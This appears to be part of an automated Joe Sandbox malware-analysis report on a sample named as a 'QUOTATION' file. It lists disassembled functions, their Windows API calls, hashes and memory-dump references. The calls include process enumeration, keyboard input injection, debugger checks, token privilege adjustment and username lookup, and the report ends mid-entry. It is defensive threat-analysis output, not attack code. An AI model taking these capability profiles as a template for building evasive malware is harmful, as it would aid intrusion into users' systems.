                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                            • API String ID: 0-2761157908
                                                                            • Opcode ID: 394d06717f5209dc2950c209544e15646a25e54c85a5686582eeb882cb14e821
                                                                            • Instruction ID: 78f5f296f8f5d69b5852b3ccadfebfd4fc7e0e54c9e3f9d64b417092e3921666
                                                                            • Opcode Fuzzy Hash: 394d06717f5209dc2950c209544e15646a25e54c85a5686582eeb882cb14e821
                                                                            • Instruction Fuzzy Hash: 94C26B71E086288FDB65CF28DD407EAB7B6EB48305F1441EAD84EE7241E775AE858F40
                                                                            Function 006BA67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 006BA6AC
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 006BA6BA
                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 006BA79C
                                                                            • CloseHandle.KERNEL32(00000000), ref: 006BA7AB
                                                                              • Part of subcall function 0064CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00673303,?), ref: 0064CE8A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 2000298826-0
                                                                            • Opcode ID: 277b28abf60b9d2539e6bd78d67441dce24c0cecace392a7a5463b20ea72624d
                                                                            • Instruction ID: b60cafd03068b1d8e11cba204cc90f04be6ae211e34313f30fe7f2d03792e185
                                                                            • Opcode Fuzzy Hash: 277b28abf60b9d2539e6bd78d67441dce24c0cecace392a7a5463b20ea72624d
                                                                            • Instruction Fuzzy Hash: 49516DB1508300AFD750EF24C886E6BBBEAFF89754F00892DF58997251EB70D904CB96
                                                                            Function 0069AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0069AAAC
                                                                            • SetKeyboardState.USER32(00000080), ref: 0069AAC8
                                                                            • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0069AB36
                                                                            • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0069AB88
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                            • String ID:
                                                                            • API String ID: 432972143-0
                                                                            • Opcode ID: 1cb82b96ba282929649095405798940d22583f4fe6eb26712cc5efac9f3f2d6d
                                                                            • Instruction ID: 8e752b42933bfef0ba15b44d9c6afcdae9f9589767abda2adf9654a809cd4f6a
                                                                            • Opcode Fuzzy Hash: 1cb82b96ba282929649095405798940d22583f4fe6eb26712cc5efac9f3f2d6d
                                                                            • Instruction Fuzzy Hash: D6310930A40248AFEF358BA9CC05BFA77EFAB44320F04421AE5C556AD4D7749981C7E6
                                                                            Function 006ACE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 006ACE89
                                                                            • GetLastError.KERNEL32(?,00000000), ref: 006ACEEA
                                                                            • SetEvent.KERNEL32(?,?,00000000), ref: 006ACEFE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ErrorEventFileInternetLastRead
                                                                            • String ID:
                                                                            • API String ID: 234945975-0
                                                                            • Opcode ID: f5f3ab162f6048a8ceb610abee09ebe0a6d78b00963c450ec37cb9d60aa04218
                                                                            • Instruction ID: 3943683fd7bbffa7e07c55b87dea271796f03de7cc08c7b275d53e01b74c979e
                                                                            • Opcode Fuzzy Hash: f5f3ab162f6048a8ceb610abee09ebe0a6d78b00963c450ec37cb9d60aa04218
                                                                            • Instruction Fuzzy Hash: F5219DB1500705AFEB20EF65C948BA677FAEF42364F10442EE64692251E774EE09CFA4
                                                                            Function 0065083F Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0065084B
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 00650916
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 00650936
                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 00650940
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                            • String ID:
                                                                            • API String ID: 254469556-0
                                                                            • Opcode ID: 913615b7bac0ab2ca14087a76eeb71dc70a7c4d6168d0782c667e248eec04243
                                                                            • Instruction ID: 694db9d16960781dd6a3ae80999d49710a35c80d5d4291cf4cc4ce3e9ff15a25
                                                                            • Opcode Fuzzy Hash: 913615b7bac0ab2ca14087a76eeb71dc70a7c4d6168d0782c667e248eec04243
                                                                            • Instruction Fuzzy Hash: BA314D75D0131D9BDB10DFA4D989BCDBBB8AF04301F1041EAE40DA7250EB759A888F44
                                                                            Function 0069DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,00675222), ref: 0069DBCE
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 0069DBDD
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0069DBEE
                                                                            • FindClose.KERNEL32(00000000), ref: 0069DBFA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                            • String ID:
                                                                            • API String ID: 2695905019-0
                                                                            • Opcode ID: 05676ad06b82452439491b0144d3df84126f44daa453db984ea5b273ee8c087c
                                                                            • Instruction ID: 01d5e6c590f9dc244ef9e6b74b3286e87a9db68b553dd022c592933a3bee37c6
                                                                            • Opcode Fuzzy Hash: 05676ad06b82452439491b0144d3df84126f44daa453db984ea5b273ee8c087c
                                                                            • Instruction Fuzzy Hash: D6F0A0B081091097CB206B78EC0D8BA776E9E013B4B144712F83AC2AE0EBB45A558695
                                                                            Function 00650C21 Relevance: 6.0, APIs: 4, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00650D40,006CFE34,00000017), ref: 00650C26
                                                                            • UnhandledExceptionFilter.KERNEL32(006CFE34,?,00650D40,006CFE34,00000017), ref: 00650C2F
                                                                            • GetCurrentProcess.KERNEL32(C0000409,?,00650D40,006CFE34,00000017), ref: 00650C3A
                                                                            • TerminateProcess.KERNEL32(00000000,?,00650D40,006CFE34,00000017), ref: 00650C41
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                            • String ID:
                                                                            • API String ID: 3231755760-0
                                                                            • Opcode ID: a59d38b57b8ff42b61059f097b649d2b693af68c90348b48630d6bec3c23f580
                                                                            • Instruction ID: 88ae640b956afd7a73cbc60e56435182c430de75e549e8b45993b245de0d6c2a
                                                                            • Opcode Fuzzy Hash: a59d38b57b8ff42b61059f097b649d2b693af68c90348b48630d6bec3c23f580
                                                                            • Instruction Fuzzy Hash: ABD01271444248ABC7002BE1FC0DE783F2EFB08626F08D000F70DC1421CB3144018B95
                                                                            Function 0066B952 Relevance: 4.9, APIs: 3, Instructions: 370timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,006D3700), ref: 0066BB91
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0070121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0066BC09
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00701270,000000FF,?,0000003F,00000000,?), ref: 0066BC36
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$InformationTimeZone
                                                                            • String ID:
                                                                            • API String ID: 1904278450-0
                                                                            • Opcode ID: 3d5c5d4fbe460054a7404d459edc734daeeed20bc2f5b4a02921b40fef8d8fad
                                                                            • Instruction ID: 8cd827e47933ee21310ac3e70945d00115ee38873eade524ef555246b1184a1c
                                                                            • Opcode Fuzzy Hash: 3d5c5d4fbe460054a7404d459edc734daeeed20bc2f5b4a02921b40fef8d8fad
                                                                            • Instruction Fuzzy Hash: 53C12671A04205EFCB209F69CC41AEA7BBBEF41310F18629EE494D7352EB309E81CB54
                                                                            Function 006A5C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 006A5CC1
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 006A5D17
                                                                            • FindClose.KERNEL32(?), ref: 006A5D5F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstNext
                                                                            • String ID:
                                                                            • API String ID: 3541575487-0
                                                                            • Opcode ID: 80368b284203e57103688a5f513659099192b7300969712f853c6d2ba15f3872
                                                                            • Instruction ID: 5063774f6e5af436a536ff5909b931377ba2fb66152fd59e6eacb43139addf34
                                                                            • Opcode Fuzzy Hash: 80368b284203e57103688a5f513659099192b7300969712f853c6d2ba15f3872
                                                                            • Instruction Fuzzy Hash: C8519A74604A019FC714EF28C494EAAB7E6FF4A324F14855DE99A8B3A1CB30ED05CF95
                                                                            Function 00662622 Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsDebuggerPresent.KERNEL32 ref: 0066271A
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00662724
                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 00662731
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                            • String ID:
                                                                            • API String ID: 3906539128-0
                                                                            • Opcode ID: 39a46545a31bc3bd4b3f35650f188db1ab2d9ae50f4648436d5b4a2be0237f40
                                                                            • Instruction ID: b6b62b22d15a446c2cb29286d45835308533a68c7a372ebd21067b156e727d04
                                                                            • Opcode Fuzzy Hash: 39a46545a31bc3bd4b3f35650f188db1ab2d9ae50f4648436d5b4a2be0237f40
                                                                            • Instruction Fuzzy Hash: D931D47490121DABCB61DF68DC88BDCBBB9AF08310F5041EAE80CA7261E7309F858F44
                                                                            Function 006A51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 006A51DA
                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 006A5238
                                                                            • SetErrorMode.KERNEL32(00000000), ref: 006A52A1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$DiskFreeSpace
                                                                            • String ID:
                                                                            • API String ID: 1682464887-0
                                                                            • Opcode ID: 3cbccf0d3364c012f496ebb1eaf3601d23d4182c6b2c234d49bda9cab13d1325
                                                                            • Instruction ID: 98140618dc40d7b1427caa9e06c32cc2c0080d95679f3ab2310fdafbfed6d798
                                                                            • Opcode Fuzzy Hash: 3cbccf0d3364c012f496ebb1eaf3601d23d4182c6b2c234d49bda9cab13d1325
                                                                            • Instruction Fuzzy Hash: F4312B75A00518DFDB00DF55D884EADBBB6FF49314F088099E80AAB362DB31ED56CB90
                                                                            Function 006916C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0069170D
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0069173A
                                                                            • GetLastError.KERNEL32 ref: 0069174A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                            • String ID:
                                                                            • API String ID: 4244140340-0
                                                                            • Opcode ID: 977851e310fe1a00e099ae0ca9c3a61a88aca90a002c09aafe3f43ecad0ffc08
                                                                            • Instruction ID: 4a00ee551eb3b95209e696105e6c7e34dcf6f3768fedc0d447525017bd21ec22
                                                                            • Opcode Fuzzy Hash: 977851e310fe1a00e099ae0ca9c3a61a88aca90a002c09aafe3f43ecad0ffc08
                                                                            • Instruction Fuzzy Hash: C511C1B2900305AFE7189F54EC86D6AB7BEEF04724B24852EE0565B641EB70BC428B24
                                                                            Function 0069D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0069D608
                                                                            • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0069D645
                                                                            • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0069D650
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                                            • String ID:
                                                                            • API String ID: 33631002-0
                                                                            • Opcode ID: 336c100028f41cb2cdbeeaf1ba5afed24f806b5581d455cbaa973bb77dcd2e35
                                                                            • Instruction ID: e1c0334a13c671c7ff8b4361ea26cac97015c6b4664f8a098ec864da4fd39065
                                                                            • Opcode Fuzzy Hash: 336c100028f41cb2cdbeeaf1ba5afed24f806b5581d455cbaa973bb77dcd2e35
                                                                            • Instruction Fuzzy Hash: 22115E75E05228BFDB108F95EC45FAFBBBDEB45B60F108125F908E7290D6704A058BA1
                                                                            Function 00691663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0069168C
                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 006916A1
                                                                            • FreeSid.ADVAPI32(?), ref: 006916B1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                            • String ID:
                                                                            • API String ID: 3429775523-0
                                                                            • Opcode ID: 48d5c038f44badc6819de66be5f298489a5ab38246ac8231dda8dea53edcd150
                                                                            • Instruction ID: df088e39bdc9c63eb06a92fa53cf962e505dd3027147b52af38e6da27c13662e
                                                                            • Opcode Fuzzy Hash: 48d5c038f44badc6819de66be5f298489a5ab38246ac8231dda8dea53edcd150
                                                                            • Instruction Fuzzy Hash: 20F0F471A50309FBDF00DFE49C89EAEBBBDFB08614F504565E901E2181E775AA448A54
                                                                            Function 00654CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(006628E9,?,00654CBE,006628E9,006F88B8,0000000C,00654E15,006628E9,00000002,00000000,?,006628E9), ref: 00654D09
                                                                            • TerminateProcess.KERNEL32(00000000,?,00654CBE,006628E9,006F88B8,0000000C,00654E15,006628E9,00000002,00000000,?,006628E9), ref: 00654D10
                                                                            • ExitProcess.KERNEL32 ref: 00654D22
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Process$CurrentExitTerminate
                                                                            • String ID:
                                                                            • API String ID: 1703294689-0
                                                                            • Opcode ID: 4f244e6acf8add289b2504fff7b6a8c6f42c39426ecc082b8f5e3e2ec6020281
                                                                            • Instruction ID: b8450dca5e86c4fbbb72e7657f506477f2bb003fc83eae2043b389b9a04927c0
                                                                            • Opcode Fuzzy Hash: 4f244e6acf8add289b2504fff7b6a8c6f42c39426ecc082b8f5e3e2ec6020281
                                                                            • Instruction Fuzzy Hash: C9E0B631400548ABCF11AF54EE09EA83B7BFF41796F145158FC098B622CF36DD86CA94
                                                                            Function 0066C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: /
                                                                            • API String ID: 0-2043925204
                                                                            • Opcode ID: 3093816e78d39dde9c1fc5264c5c72db5177ec1decd5cdba931268f2e9ccd7f1
                                                                            • Instruction ID: 798efdd356e91411b01402a9d96b71d724735e1355e343955b4bb18a1b7aa076
                                                                            • Opcode Fuzzy Hash: 3093816e78d39dde9c1fc5264c5c72db5177ec1decd5cdba931268f2e9ccd7f1
                                                                            • Instruction Fuzzy Hash: BA413872500A19AFCB209FB9CC48DFB77BAEB84324F10426DF945D7280E6319E418B54
                                                                            Function 0068D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 0068D28C
                                                                            Strings
                                                                            Memory Dump Source
